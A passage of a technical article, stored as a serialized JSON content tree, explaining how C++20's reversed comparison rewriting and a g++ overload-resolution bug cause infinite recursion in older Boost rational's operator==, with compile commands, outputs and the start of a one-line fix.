"type":26,"tag":137,"props":93271,"children":93272},{"style":5601},[93273],{"type":32,"value":8391},{"type":26,"tag":137,"props":93275,"children":93276},{"style":6009},[93277],{"type":32,"value":93278},"IntType",{"type":26,"tag":137,"props":93280,"children":93281},{"style":5601},[93282],{"type":32,"value":13052},{"type":26,"tag":137,"props":93284,"children":93285},{"style":5573},[93286],{"type":32,"value":5694},{"type":26,"tag":137,"props":93288,"children":93289},{"style":5584},[93290],{"type":32,"value":92438},{"type":26,"tag":137,"props":93292,"children":93293},{"style":5601},[93294],{"type":32,"value":1108},{"type":26,"tag":137,"props":93296,"children":93297},{"style":5573},[93298],{"type":32,"value":12244},{"type":26,"tag":137,"props":93300,"children":93301},{"style":6009},[93302],{"type":32,"value":93230},{"type":26,"tag":137,"props":93304,"children":93305},{"style":5573},[93306],{"type":32,"value":5694},{"type":26,"tag":137,"props":93308,"children":93309},{"style":5584},[93310],{"type":32,"value":93311}," b",{"type":26,"tag":137,"props":93313,"children":93314},{"style":5601},[93315],{"type":32,"value":17395},{"type":26,"tag":137,"props":93317,"children":93318},{"class":5559,"line":6238},[93319,93324,93328,93333,93337],{"type":26,"tag":137,"props":93320,"children":93321},{"style":5601},[93322],{"type":32,"value":93323},"    std::cout ",{"type":26,"tag":137,"props":93325,"children":93326},{"style":5590},[93327],{"type":32,"value":93159},{"type":26,"tag":137,"props":93329,"children":93330},{"style":6837},[93331],{"type":32,"value":93332}," \"g++ \u003C14 resolved non-member\"",{"type":26,"tag":137,"props":93334,"children":93335},{"style":5590},[93336],{"type":32,"value":93169},{"type":26,"tag":137,"props":93338,"children":93339},{"style":5601},[93340],{"type":32,"value":93174},{"type":26,"tag":137,"props":93342,"children":93343},{"class":5559,"line":6247},[93344,93348,93352],{"type":26,"tag":137,"props":93345,"children":93346},{"style":5610},[93347],{"type":32,"value":19582},{"type":26,"tag":137,"props":93349,"children":93350},{"style":5573},[93351],{"type":32,"value":11645},{"type":26,"tag":137,"props":93353,"children":93354},{"style":5601},[93355],{"type":32,"value":5604},{"type":26,"tag":137,"props":93357,"children":93358},{"class":5559,"line":6270},[93359],{"type":26,"tag":137,"props":93360,"children":93361},{"style":5601},[93362],{"type":32,"value":6507},{"type":26,"tag":137,"props":93364,"children":93365},{"class":5559,"line":6279},[93366],{"type":26,"tag":137,"props":93367,"children":93368},{"emptyLinePlaceholder":18},[93369],{"type":32,"value":6276},{"type":26,"tag":137,"props":93371,"children":93372},{"class":5559,"line":6288},[93373,93377,93382],{"type":26,"tag":137,"props":93374,"children":93375},{"style":5573},[93376],{"type":32,"value":21640},{"type":26,"tag":137,"props":93378,"children":93379},{"style":5682},[93380],{"type":32,"value":93381}," main",{"type":26,"tag":137,"props":93383,"children":93384},{"style":5601},[93385],{"type":32,"value":18328},{"type":26,"tag":137,"props":93387,"children":93388},{"class":5559,"line":6355},[93389,93394,93398,93402,93406],{"type":26,"tag":137,"props":93390,"children":93391},{"style":5601},[93392],{"type":32,"value":93393},"    rational",{"type":26,"tag":137,"props":93395,"children":93396},{"style":5590},[93397],{"type":32,"value":8391},{"type":26,"tag":137,"props":93399,"children":93400},{"style":5573},[93401],{"type":32,"value":21640},{"type":26,"tag":137,"props":93403,"children":93404},{"style":5590},[93405],{"type":32,"value":13052},{"type":26,"tag":137,"props":93407,"children":93408},{"style":5601},[93409],{"type":32,"value":93410}," r;\n",{"type":26,"tag":137,"props":93412,"children":93413},{"class":5559,"line":6363},[93414,93418,93423,93427,93431],{"type":26,"tag":137,"props":93415,"children":93416},{"style":5610},[93417],{"type":32,"value":19582},{"type":26,"tag":137,"props":93419,"children":93420},{"style":5601},[93421],{"type":32,"value":93422}," r ",{"type":26,"tag":137,"props":93424,"children":93425},{"style":5590},[93426],{"type":32,"value":11161},{"type":26,"tag":137,"props":93428,"children":93429},{"style":5626},[93430],{"type":32,"value":5629},{"type":26,"tag":137,"props":93432,"children":93433},{"style":5601},[93434],{"type":32,"value":5604},{"type":26,"tag":137,"props":93436,"children":93437},{"class":5559,"line":6393},[93438],{"type":26,"tag":137,"props":93439,"children":93440},{"style":5601},[93441],{"type":32,"value":6507},{"type":26,"tag":3426,"props":93443,"children":93444},{},[93445],{"type":26,"tag":3430,"props":93446,"children":93447},{},[93448],{"type":32,"value":93449},"Compile with g++\u003C14:",{"type":26,"tag":5512,"props":93451,"children":93453},{"code":93452,"language":6822,"meta":7,"className":6823,"style":7},"g++ -std=c++17 main.cpp -o test && ./test\n",[93454],{"type":26,"tag":130,"props":93455,"children":93456},{"__ignoreMap":7},[93457],{"type":26,"tag":137,"props":93458,"children":93459},{"class":5559,"line":5560},[93460,93465,93470,93475,93480,93484,93489],{"type":26,"tag":137,"props":93461,"children":93462},{"style":5682},[93463],{"type":32,"value":93464},"g++",{"type":26,"tag":137,"props":93466,"children":93467},{"style":6837},[93468],{"type":32,"value":93469}," -std=c++17",{"type":26,"tag":137,"props":93471,"children":93472},{"style":6837},[93473],{"type":32,"value":93474}," main.cpp",{"type":26,"tag":137,"props":93476,"children":93477},{"style":6837},[93478],{"type":32,"value":93479}," -o",{"type":26,"tag":137,"props":93481,"children":93482},{"style":6837},[93483],{"type":32,"value":33272},{"type":26,"tag":137,"props":93485,"children":93486},{"style":5601},[93487],{"type":32,"value":93488}," && ",{"type":26,"tag":137,"props":93490,"children":93491},{"style":5682},[93492],{"type":32,"value":93493},"./test\n",{"type":26,"tag":35,"props":93495,"children":93496},{},[93497],{"type":32,"value":93498},"Output (on g++ 11.4):",{"type":26,"tag":5512,"props":93500,"children":93502},{"code":93501},"g++ \u003C14 resolved non-member\n",[93503],{"type":26,"tag":130,"props":93504,"children":93505},{"__ignoreMap":7},[93506],{"type":32,"value":93501},{"type":26,"tag":3426,"props":93508,"children":93509},{},[93510],{"type":26,"tag":3430,"props":93511,"children":93512},{},[93513],{"type":32,"value":93514},"Compile with clang++:",{"type":26,"tag":5512,"props":93516,"children":93518},{"code":93517,"language":6822,"meta":7,"className":6823,"style":7},"clang++ -std=c++17 main.cpp -o test && ./test\n",[93519],{"type":26,"tag":130,"props":93520,"children":93521},{"__ignoreMap":7},[93522],{"type":26,"tag":137,"props":93523,"children":93524},{"class":5559,"line":5560},[93525,93530,93534,93538,93542,93546,93550],{"type":26,"tag":137,"props":93526,"children":93527},{"style":5682},[93528],{"type":32,"value":93529},"clang++",{"type":26,"tag":137,"props":93531,"children":93532},{"style":6837},[93533],{"type":32,"value":93469},{"type":26,"tag":137,"props":93535,"children":93536},{"style":6837},[93537],{"type":32,"value":93474},{"type":26,"tag":137,"props":93539,"children":93540},{"style":6837},[93541],{"type":32,"value":93479},{"type":26,"tag":137,"props":93543,"children":93544},{"style":6837},[93545],{"type":32,"value":33272},{"type":26,"tag":137,"props":93547,"children":93548},{"style":5601},[93549],{"type":32,"value":93488},{"type":26,"tag":137,"props":93551,"children":93552},{"style":5682},[93553],{"type":32,"value":93493},{"type":26,"tag":35,"props":93555,"children":93556},{},[93557],{"type":32,"value":93558},"Output:",{"type":26,"tag":5512,"props":93560,"children":93562},{"code":93561},"clang++ resolved member\n",[93563],{"type":26,"tag":130,"props":93564,"children":93565},{"__ignoreMap":7},[93566],{"type":32,"value":93561},{"type":26,"tag":35,"props":93568,"children":93569},{},[93570],{"type":32,"value":93571},"In short, the wrong function gets picked. G++ was broken here until v14.",{"type":26,"tag":3265,"props":93573,"children":93574},{},[],{"type":26,"tag":92,"props":93576,"children":93578},{"id":93577},"part-ii-c20s-symmetric-comparison-feature",[93579],{"type":32,"value":93580},"Part II: C++20’s Symmetric Comparison Feature",{"type":26,"tag":118,"props":93582,"children":93584},{"id":93583},"what-changed-in-c20",[93585],{"type":32,"value":93586},"What Changed in C++20?",{"type":26,"tag":35,"props":93588,"children":93589},{},[93590,93592,93605,93606,93611],{"type":32,"value":93591},"C++20 introduced the ",{"type":26,"tag":41,"props":93593,"children":93596},{"href":93594,"rel":93595},"https://en.cppreference.com/w/cpp/language/operator_comparison",[45],[93597,93599],{"type":32,"value":93598},"spaceship operator ",{"type":26,"tag":130,"props":93600,"children":93602},{"className":93601},[],[93603],{"type":32,"value":93604},"\u003C=>",{"type":32,"value":3339},{"type":26,"tag":84,"props":93607,"children":93608},{},[93609],{"type":32,"value":93610},"defaulted comparison rewrites",{"type":32,"value":470},{"type":26,"tag":35,"props":93613,"children":93614},{},[93615,93617,93622],{"type":32,"value":93616},"When you define a two-argument ",{"type":26,"tag":130,"props":93618,"children":93620},{"className":93619},[],[93621],{"type":32,"value":92857},{"type":32,"value":93623},", C++20 may implicitly define the \"reversed\" version:",{"type":26,"tag":3426,"props":93625,"children":93626},{},[93627,93638],{"type":26,"tag":3430,"props":93628,"children":93629},{},[93630,93632],{"type":32,"value":93631},"If you define: ",{"type":26,"tag":130,"props":93633,"children":93635},{"className":93634},[],[93636],{"type":32,"value":93637},"bool operator==(T1, T2);",{"type":26,"tag":3430,"props":93639,"children":93640},{},[93641,93643,93649],{"type":32,"value":93642},"Then ",{"type":26,"tag":130,"props":93644,"children":93646},{"className":93645},[],[93647],{"type":32,"value":93648},"T2 == T1",{"type":32,"value":93650}," may call the same function by reversing the arguments.",{"type":26,"tag":35,"props":93652,"children":93653},{},[93654,93656,93661,93662,93667,93669,93675,93677,93682],{"type":32,"value":93655},"This rewrite is ",{"type":26,"tag":84,"props":93657,"children":93658},{},[93659],{"type":32,"value":93660},"recursive",{"type":32,"value":17923},{"type":26,"tag":130,"props":93663,"children":93665},{"className":93664},[],[93666],{"type":32,"value":92849},{"type":32,"value":93668}," becomes ",{"type":26,"tag":130,"props":93670,"children":93672},{"className":93671},[],[93673],{"type":32,"value":93674},"b == a",{"type":32,"value":93676},", which becomes ",{"type":26,"tag":130,"props":93678,"children":93680},{"className":93679},[],[93681],{"type":32,"value":92849},{"type":32,"value":93683}," again, and so on — if not handled carefully.",{"type":26,"tag":35,"props":93685,"children":93686},{},[93687],{"type":32,"value":93688},"This is great for reducing boilerplate — unless the call becomes ambiguous or self-referential.",{"type":26,"tag":3265,"props":93690,"children":93691},{},[],{"type":26,"tag":92,"props":93693,"children":93695},{"id":93694},"part-iii-the-boost-trapdoor",[93696],{"type":32,"value":93697},"Part III: The Boost Trapdoor",{"type":26,"tag":35,"props":93699,"children":93700},{},[93701,93703,93709,93711,93716],{"type":32,"value":93702},"The old Boost ",{"type":26,"tag":130,"props":93704,"children":93706},{"className":93705},[],[93707],{"type":32,"value":93708},"rational",{"type":32,"value":93710}," class (prior to v1.75) defined both member function and non-member function of ",{"type":26,"tag":130,"props":93712,"children":93714},{"className":93713},[],[93715],{"type":32,"value":92857},{"type":32,"value":7072},{"type":26,"tag":5512,"props":93718,"children":93720},{"code":93719,"language":31706,"meta":7,"className":31704,"style":7},"template \u003Cclass Arg, class IntType>\ntemplate \u003Ctypename IntType>\nclass rational\n{\n    ...\npublic:\n    ...\n    \n    template \u003Cclass T>\n    BOOST_CONSTEXPR typename boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003CT, IntType>::value, bool>::type operator== (const T& i) const\n    {\n       return ((den == IntType(1)) && (num == i));\n    }\n    ...\n}\n\ntemplate \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n      return a == b; \n}\n",[93721],{"type":26,"tag":130,"props":93722,"children":93723},{"__ignoreMap":7},[93724,93759,93782,93794,93801,93808,93815,93822,93829,93852,93940,93947,93998,94005,94012,94019,94026,94061,94069,94097,94136,94201,94208,94228],{"type":26,"tag":137,"props":93725,"children":93726},{"class":5559,"line":5560},[93727,93731,93735,93739,93743,93747,93751,93755],{"type":26,"tag":137,"props":93728,"children":93729},{"style":5573},[93730],{"type":32,"value":68817},{"type":26,"tag":137,"props":93732,"children":93733},{"style":5601},[93734],{"type":32,"value":11305},{"type":26,"tag":137,"props":93736,"children":93737},{"style":5573},[93738],{"type":32,"value":73012},{"type":26,"tag":137,"props":93740,"children":93741},{"style":6009},[93742],{"type":32,"value":93230},{"type":26,"tag":137,"props":93744,"children":93745},{"style":5601},[93746],{"type":32,"value":1108},{"type":26,"tag":137,"props":93748,"children":93749},{"style":5573},[93750],{"type":32,"value":73012},{"type":26,"tag":137,"props":93752,"children":93753},{"style":6009},[93754],{"type":32,"value":93049},{"type":26,"tag":137,"props":93756,"children":93757},{"style":5601},[93758],{"type":32,"value":8577},{"type":26,"tag":137,"props":93760,"children":93761},{"class":5559,"line":5412},[93762,93766,93770,93774,93778],{"type":26,"tag":137,"props":93763,"children":93764},{"style":5573},[93765],{"type":32,"value":68817},{"type":26,"tag":137,"props":93767,"children":93768},{"style":5601},[93769],{"type":32,"value":11305},{"type":26,"tag":137,"props":93771,"children":93772},{"style":5573},[93773],{"type":32,"value":93044},{"type":26,"tag":137,"props":93775,"children":93776},{"style":6009},[93777],{"type":32,"value":93049},{"type":26,"tag":137,"props":93779,"children":93780},{"style":5601},[93781],{"type":32,"value":8577},{"type":26,"tag":137,"props":93783,"children":93784},{"class":5559,"line":5417},[93785,93789],{"type":26,"tag":137,"props":93786,"children":93787},{"style":5573},[93788],{"type":32,"value":73012},{"type":26,"tag":137,"props":93790,"children":93791},{"style":6009},[93792],{"type":32,"value":93793}," rational\n",{"type":26,"tag":137,"props":93795,"children":93796},{"class":5559,"line":5642},[93797],{"type":26,"tag":137,"props":93798,"children":93799},{"style":5601},[93800],{"type":32,"value":13471},{"type":26,"tag":137,"props":93802,"children":93803},{"class":5559,"line":5745},[93804],{"type":26,"tag":137,"props":93805,"children":93806},{"style":5601},[93807],{"type":32,"value":22933},{"type":26,"tag":137,"props":93809,"children":93810},{"class":5559,"line":5850},[93811],{"type":26,"tag":137,"props":93812,"children":93813},{"style":5573},[93814],{"type":32,"value":93077},{"type":26,"tag":137,"props":93816,"children":93817},{"class":5559,"line":5878},[93818],{"type":26,"tag":137,"props":93819,"children":93820},{"style":5601},[93821],{"type":32,"value":22933},{"type":26,"tag":137,"props":93823,"children":93824},{"class":5559,"line":5891},[93825],{"type":26,"tag":137,"props":93826,"children":93827},{"style":5601},[93828],{"type":32,"value":64387},{"type":26,"tag":137,"props":93830,"children":93831},{"class":5559,"line":5909},[93832,93836,93840,93844,93848],{"type":26,"tag":137,"props":93833,"children":93834},{"style":5573},[93835],{"type":32,"value":93085},{"type":26,"tag":137,"props":93837,"children":93838},{"style":5601},[93839],{"type":32,"value":11305},{"type":26,"tag":137,"props":93841,"children":93842},{"style":5573},[93843],{"type":32,"value":73012},{"type":26,"tag":137,"props":93845,"children":93846},{"style":6009},[93847],{"type":32,"value":8504},{"type":26,"tag":137,"props":93849,"children":93850},{"style":5601},[93851],{"type":32,"value":8577},{"type":26,"tag":137,"props":93853,"children":93854},{"class":5559,"line":5930},[93855,93860,93864,93869,93873,93877,93881,93886,93890,93894,93898,93902,93906,93910,93915,93919,93923,93927,93931,93935],{"type":26,"tag":137,"props":93856,"children":93857},{"style":5601},[93858],{"type":32,"value":93859},"    BOOST_CONSTEXPR ",{"type":26,"tag":137,"props":93861,"children":93862},{"style":5573},[93863],{"type":32,"value":93044},{"type":26,"tag":137,"props":93865,"children":93866},{"style":5601},[93867],{"type":32,"value":93868}," boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003C",{"type":26,"tag":137,"props":93870,"children":93871},{"style":6009},[93872],{"type":32,"value":2064},{"type":26,"tag":137,"props":93874,"children":93875},{"style":5601},[93876],{"type":32,"value":1108},{"type":26,"tag":137,"props":93878,"children":93879},{"style":6009},[93880],{"type":32,"value":93278},{"type":26,"tag":137,"props":93882,"children":93883},{"style":5601},[93884],{"type":32,"value":93885},">::",{"type":26,"tag":137,"props":93887,"children":93888},{"style":6009},[93889],{"type":32,"value":41748},{"type":26,"tag":137,"props":93891,"children":93892},{"style":5601},[93893],{"type":32,"value":1108},{"type":26,"tag":137,"props":93895,"children":93896},{"style":5573},[93897],{"type":32,"value":32279},{"type":26,"tag":137,"props":93899,"children":93900},{"style":5601},[93901],{"type":32,"value":93885},{"type":26,"tag":137,"props":93903,"children":93904},{"style":6009},[93905],{"type":32,"value":35352},{"type":26,"tag":137,"props":93907,"children":93908},{"style":5573},[93909],{"type":32,"value":93113},{"type":26,"tag":137,"props":93911,"children":93912},{"style":5601},[93913],{"type":32,"value":93914},"== (",{"type":26,"tag":137,"props":93916,"children":93917},{"style":5573},[93918],{"type":32,"value":12244},{"type":26,"tag":137,"props":93920,"children":93921},{"style":6009},[93922],{"type":32,"value":8504},{"type":26,"tag":137,"props":93924,"children":93925},{"style":5573},[93926],{"type":32,"value":5694},{"type":26,"tag":137,"props":93928,"children":93929},{"style":5584},[93930],{"type":32,"value":5988},{"type":26,"tag":137,"props":93932,"children":93933},{"style":5601},[93934],{"type":32,"value":5671},{"type":26,"tag":137,"props":93936,"children":93937},{"style":5573},[93938],{"type":32,"value":93939},"const\n",{"type":26,"tag":137,"props":93941,"children":93942},{"class":5559,"line":5939},[93943],{"type":26,"tag":137,"props":93944,"children":93945},{"style":5601},[93946],{"type":32,"value":31781},{"type":26,"tag":137,"props":93948,"children":93949},{"class":5559,"line":6191},[93950,93955,93960,93964,93968,93972,93976,93980,93984,93989,93993],{"type":26,"tag":137,"props":93951,"children":93952},{"style":5610},[93953],{"type":32,"value":93954},"       return",{"type":26,"tag":137,"props":93956,"children":93957},{"style":5601},[93958],{"type":32,"value":93959}," ((den ",{"type":26,"tag":137,"props":93961,"children":93962},{"style":5590},[93963],{"type":32,"value":11161},{"type":26,"tag":137,"props":93965,"children":93966},{"style":5682},[93967],{"type":32,"value":93049},{"type":26,"tag":137,"props":93969,"children":93970},{"style":5601},[93971],{"type":32,"value":165},{"type":26,"tag":137,"props":93973,"children":93974},{"style":5626},[93975],{"type":32,"value":878},{"type":26,"tag":137,"props":93977,"children":93978},{"style":5601},[93979],{"type":32,"value":11423},{"type":26,"tag":137,"props":93981,"children":93982},{"style":5590},[93983],{"type":32,"value":75798},{"type":26,"tag":137,"props":93985,"children":93986},{"style":5601},[93987],{"type":32,"value":93988}," (num ",{"type":26,"tag":137,"props":93990,"children":93991},{"style":5590},[93992],{"type":32,"value":11161},{"type":26,"tag":137,"props":93994,"children":93995},{"style":5601},[93996],{"type":32,"value":93997}," i));\n",{"type":26,"tag":137,"props":93999,"children":94000},{"class":5559,"line":6208},[94001],{"type":26,"tag":137,"props":94002,"children":94003},{"style":5601},[94004],{"type":32,"value":5945},{"type":26,"tag":137,"props":94006,"children":94007},{"class":5559,"line":6225},[94008],{"type":26,"tag":137,"props":94009,"children":94010},{"style":5601},[94011],{"type":32,"value":22933},{"type":26,"tag":137,"props":94013,"children":94014},{"class":5559,"line":6238},[94015],{"type":26,"tag":137,"props":94016,"children":94017},{"style":5601},[94018],{"type":32,"value":6507},{"type":26,"tag":137,"props":94020,"children":94021},{"class":5559,"line":6247},[94022],{"type":26,"tag":137,"props":94023,"children":94024},{"emptyLinePlaceholder":18},[94025],{"type":32,"value":6276},{"type":26,"tag":137,"props":94027,"children":94028},{"class":5559,"line":6270},[94029,94033,94037,94041,94045,94049,94053,94057],{"type":26,"tag":137,"props":94030,"children":94031},{"style":5573},[94032],{"type":32,"value":68817},{"type":26,"tag":137,"props":94034,"children":94035},{"style":5601},[94036],{"type":32,"value":11305},{"type":26,"tag":137,"props":94038,"children":94039},{"style":5573},[94040],{"type":32,"value":73012},{"type":26,"tag":137,"props":94042,"children":94043},{"style":6009},[94044],{"type":32,"value":93230},{"type":26,"tag":137,"props":94046,"children":94047},{"style":5601},[94048],{"type":32,"value":1108},{"type":26,"tag":137,"props":94050,"children":94051},{"style":5573},[94052],{"type":32,"value":73012},{"type":26,"tag":137,"props":94054,"children":94055},{"style":6009},[94056],{"type":32,"value":93049},{"type":26,"tag":137,"props":94058,"children":94059},{"style":5601},[94060],{"type":32,"value":8577},{"type":26,"tag":137,"props":94062,"children":94063},{"class":5559,"line":6279},[94064],{"type":26,"tag":137,"props":94065,"children":94066},{"style":5601},[94067],{"type":32,"value":94068},"BOOST_CONSTEXPR\n",{"type":26,"tag":137,"props":94070,"children":94071},{"class":5559,"line":6288},[94072,94077,94082,94087,94092],{"type":26,"tag":137,"props":94073,"children":94074},{"style":5573},[94075],{"type":32,"value":94076},"inline",{"type":26,"tag":137,"props":94078,"children":94079},{"style":5573},[94080],{"type":32,"value":94081}," typename",{"type":26,"tag":137,"props":94083,"children":94084},{"style":5601},[94085],{"type":32,"value":94086}," boost::",{"type":26,"tag":137,"props":94088,"children":94089},{"style":6009},[94090],{"type":32,"value":94091},"enable_if_c",{"type":26,"tag":137,"props":94093,"children":94094},{"style":5590},[94095],{"type":32,"value":94096}," \u003C\n",{"type":26,"tag":137,"props":94098,"children":94099},{"class":5559,"line":6355},[94100,94105,94110,94114,94118,94123,94127,94131],{"type":26,"tag":137,"props":94101,"children":94102},{"style":5601},[94103],{"type":32,"value":94104},"   rational_detail::is_compatible_integer\u003C",{"type":26,"tag":137,"props":94106,"children":94107},{"style":6009},[94108],{"type":32,"value":94109},"Arg",{"type":26,"tag":137,"props":94111,"children":94112},{"style":5601},[94113],{"type":32,"value":1108},{"type":26,"tag":137,"props":94115,"children":94116},{"style":6009},[94117],{"type":32,"value":93278},{"type":26,"tag":137,"props":94119,"children":94120},{"style":5601},[94121],{"type":32,"value":94122},">::value, ",{"type":26,"tag":137,"props":94124,"children":94125},{"style":5573},[94126],{"type":32,"value":32279},{"type":26,"tag":137,"props":94128,"children":94129},{"style":5590},[94130],{"type":32,"value":13052},{"type":26,"tag":137,"props":94132,"children":94133},{"style":5601},[94134],{"type":32,"value":94135},"::type\n",{"type":26,"tag":137,"props":94137,"children":94138},{"class":5559,"line":6363},[94139,94144,94149,94153,94157,94161,94165,94169,94173,94177,94181,94185,94189,94193,94197],{"type":26,"tag":137,"props":94140,"children":94141},{"style":5573},[94142],{"type":32,"value":94143},"   operator",{"type":26,"tag":137,"props":94145,"children":94146},{"style":5601},[94147],{"type":32,"value":94148}," == (",{"type":26,"tag":137,"props":94150,"children":94151},{"style":5573},[94152],{"type":32,"value":12244},{"type":26,"tag":137,"props":94154,"children":94155},{"style":6009},[94156],{"type":32,"value":93230},{"type":26,"tag":137,"props":94158,"children":94159},{"style":5573},[94160],{"type":32,"value":5694},{"type":26,"tag":137,"props":94162,"children":94163},{"style":5584},[94164],{"type":32,"value":93311},{"type":26,"tag":137,"props":94166,"children":94167},{"style":5601},[94168],{"type":32,"value":1108},{"type":26,"tag":137,"props":94170,"children":94171},{"style":5573},[94172],{"type":32,"value":12244},{"type":26,"tag":137,"props":94174,"children":94175},{"style":6009},[94176],{"type":32,"value":93065},{"type":26,"tag":137,"props":94178,"children":94179},{"style":5601},[94180],{"type":32,"value":8391},{"type":26,"tag":137,"props":94182,"children":94183},{"style":6009},[94184],{"type":32,"value":93278},{"type":26,"tag":137,"props":94186,"children":94187},{"style":5601},[94188],{"type":32,"value":13052},{"type":26,"tag":137,"props":94190,"children":94191},{"style":5573},[94192],{"type":32,"value":5694},{"type":26,"tag":137,"props":94194,"children":94195},{"style":5584},[94196],{"type":32,"value":92438},{"type":26,"tag":137,"props":94198,"children":94199},{"style":5601},[94200],{"type":32,"value":5742},{"type":26,"tag":137,"props":94202,"children":94203},{"class":5559,"line":6393},[94204],{"type":26,"tag":137,"props":94205,"children":94206},{"style":5601},[94207],{"type":32,"value":13471},{"type":26,"tag":137,"props":94209,"children":94210},{"class":5559,"line":6401},[94211,94215,94219,94223],{"type":26,"tag":137,"props":94212,"children":94213},{"style":5610},[94214],{"type":32,"value":41953},{"type":26,"tag":137,"props":94216,"children":94217},{"style":5601},[94218],{"type":32,"value":19357},{"type":26,"tag":137,"props":94220,"children":94221},{"style":5590},[94222],{"type":32,"value":11161},{"type":26,"tag":137,"props":94224,"children":94225},{"style":5601},[94226],{"type":32,"value":94227}," b; \n",{"type":26,"tag":137,"props":94229,"children":94230},{"class":5559,"line":6433},[94231],{"type":26,"tag":137,"props":94232,"children":94233},{"style":5601},[94234],{"type":32,"value":6507},{"type":26,"tag":35,"props":94236,"children":94237},{},[94238,94240,94246],{"type":32,"value":94239},"This was designed under C++17 semantics. Back then, ",{"type":26,"tag":130,"props":94241,"children":94243},{"className":94242},[],[94244],{"type":32,"value":94245},"rhs == lhs",{"type":32,"value":94247}," would fall back to member overloads if available. All good.",{"type":26,"tag":35,"props":94249,"children":94250},{},[94251,94253,94258,94259,94265],{"type":32,"value":94252},"But under ",{"type":26,"tag":130,"props":94254,"children":94256},{"className":94255},[],[94257],{"type":32,"value":92803},{"type":32,"value":2081},{"type":26,"tag":130,"props":94260,"children":94262},{"className":94261},[],[94263],{"type":32,"value":94264},"G++ \u003C 14",{"type":32,"value":7072},{"type":26,"tag":3426,"props":94267,"children":94268},{},[94269,94274,94279,94284],{"type":26,"tag":3430,"props":94270,"children":94271},{},[94272],{"type":32,"value":94273},"G++ incorrectly chooses this non-member operator first",{"type":26,"tag":3430,"props":94275,"children":94276},{},[94277],{"type":32,"value":94278},"C++20 reverses the comparison",{"type":26,"tag":3430,"props":94280,"children":94281},{},[94282],{"type":32,"value":94283},"Which calls the same function again with arguments flipped",{"type":26,"tag":3430,"props":94285,"children":94286},{},[94287],{"type":32,"value":94288},"And so on...",{"type":26,"tag":35,"props":94290,"children":94291},{},[94292,94294,94299],{"type":32,"value":94293},"This creates ",{"type":26,"tag":84,"props":94295,"children":94296},{},[94297],{"type":32,"value":94298},"infinite recursion",{"type":32,"value":470},{"type":26,"tag":35,"props":94301,"children":94302},{},[94303],{"type":32,"value":94304},"A minimal example:",{"type":26,"tag":5512,"props":94306,"children":94308},{"code":94307,"language":31706,"meta":7,"className":31704,"style":7},"// g++ -std=c++20 -o crash main.cpp && ./crash\n#include \u003Cboost/rational.hpp>\n\nint main() {\n    boost::rational\u003Cint> r;\n    return r == 0;\n}\n",[94309],{"type":26,"tag":130,"props":94310,"children":94311},{"__ignoreMap":7},[94312,94320,94332,94339,94354,94378,94401],{"type":26,"tag":137,"props":94313,"children":94314},{"class":5559,"line":5560},[94315],{"type":26,"tag":137,"props":94316,"children":94317},{"style":5564},[94318],{"type":32,"value":94319},"// g++ -std=c++20 -o crash main.cpp && ./crash\n",{"type":26,"tag":137,"props":94321,"children":94322},{"class":5559,"line":5412},[94323,94327],{"type":26,"tag":137,"props":94324,"children":94325},{"style":5610},[94326],{"type":32,"value":93016},{"type":26,"tag":137,"props":94328,"children":94329},{"style":6837},[94330],{"type":32,"value":94331}," \u003Cboost/rational.hpp>\n",{"type":26,"tag":137,"props":94333,"children":94334},{"class":5559,"line":5417},[94335],{"type":26,"tag":137,"props":94336,"children":94337},{"emptyLinePlaceholder":18},[94338],{"type":32,"value":6276},{"type":26,"tag":137,"props":94340,"children":94341},{"class":5559,"line":5642},[94342,94346,94350],{"type":26,"tag":137,"props":94343,"children":94344},{"style":5573},[94345],{"type":32,"value":21640},{"type":26,"tag":137,"props":94347,"children":94348},{"style":5682},[94349],{"type":32,"value":93381},{"type":26,"tag":137,"props":94351,"children":94352},{"style":5601},[94353],{"type":32,"value":18328},{"type":26,"tag":137,"props":94355,"children":94356},{"class":5559,"line":5745},[94357,94362,94366,94370,94374],{"type":26,"tag":137,"props":94358,"children":94359},{"style":5601},[94360],{"type":32,"value":94361},"    boost::rational",{"type":26,"tag":137,"props":94363,"children":94364},{"style":5590},[94365],{"type":32,"value":8391},{"type":26,"tag":137,"props":94367,"children":94368},{"style":5573},[94369],{"type":32,"value":21640},{"type":26,"tag":137,"props":94371,"children":94372},{"style":5590},[94373],{"type":32,"value":13052},{"type":26,"tag":137,"props":94375,"children":94376},{"style":5601},[94377],{"type":32,"value":93410},{"type":26,"tag":137,"props":94379,"children":94380},{"class":5559,"line":5850},[94381,94385,94389,94393,94397],{"type":26,"tag":137,"props":94382,"children":94383},{"style":5610},[94384],{"type":32,"value":19582},{"type":26,"tag":137,"props":94386,"children":94387},{"style":5601},[94388],{"type":32,"value":93422},{"type":26,"tag":137,"props":94390,"children":94391},{"style":5590},[94392],{"type":32,"value":11161},{"type":26,"tag":137,"props":94394,"children":94395},{"style":5626},[94396],{"type":32,"value":5629},{"type":26,"tag":137,"props":94398,"children":94399},{"style":5601},[94400],{"type":32,"value":5604},{"type":26,"tag":137,"props":94402,"children":94403},{"class":5559,"line":5878},[94404],{"type":26,"tag":137,"props":94405,"children":94406},{"style":5601},[94407],{"type":32,"value":6507},{"type":26,"tag":35,"props":94409,"children":94410},{},[94411],{"type":32,"value":94412},"Expected output: nothing.",{"type":26,"tag":35,"props":94414,"children":94415},{},[94416],{"type":32,"value":94417},"Actual: segmentation fault (stack overflow).",{"type":26,"tag":35,"props":94419,"children":94420},{},[94421,94423,94430],{"type":32,"value":94422},"This exact pattern was ",{"type":26,"tag":41,"props":94424,"children":94427},{"href":94425,"rel":94426},"https://github.com/boostorg/rational/issues/43",[45],[94428],{"type":32,"value":94429},"reported and fixed in Boost rational",{"type":32,"value":94431},", but only in version 1.75+.",{"type":26,"tag":35,"props":94433,"children":94434},{},[94435],{"type":32,"value":94436},"Here’s the one-line fix:",{"type":26,"tag":5512,"props":94438,"children":94440},{"code":94439,"language":42959,"meta":7,"className":42957,"style":7},"template \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n   rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n   operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n-     return a == b;\n+     return 